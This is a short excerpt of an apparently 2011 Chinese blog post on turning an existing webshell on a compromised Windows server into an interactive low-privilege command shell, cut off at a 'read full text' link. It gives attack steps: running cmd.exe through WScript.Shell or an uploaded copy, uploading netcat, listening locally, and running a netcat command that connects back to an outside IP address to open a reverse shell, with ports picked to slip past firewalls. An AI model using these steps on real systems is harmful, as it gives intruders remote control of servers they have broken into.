利用WebShell反弹低权限CmdShell
摘要:
虽然是低权限的,能做的事和WebShell上的差不多,不过使用起来还是要方便很多。前提:1.能用WebShell运行cmd命令。方法有很多,首先是WScript.Shell,如果被改名或者被删了,就找可运行目录上传cmd.exe。2.上传nc。可以跟cmd.exe上传到同一目录。步骤:现在本地监听一个端口。nc -vv -l -p 8080最好是80或8080这样的端口,被防火墙拦截的几率小很多。我机器80被Apache占了,就用8080了。在WebShell运行下面命令连接我们监听的端口得到CmdShell:nc -vv 222.71.138.177 8080 -e C:\Documents 阅读全文
posted @ 2011-06-24 06:22 =_=! 阅读(783) 评论(0) 推荐(0) 编辑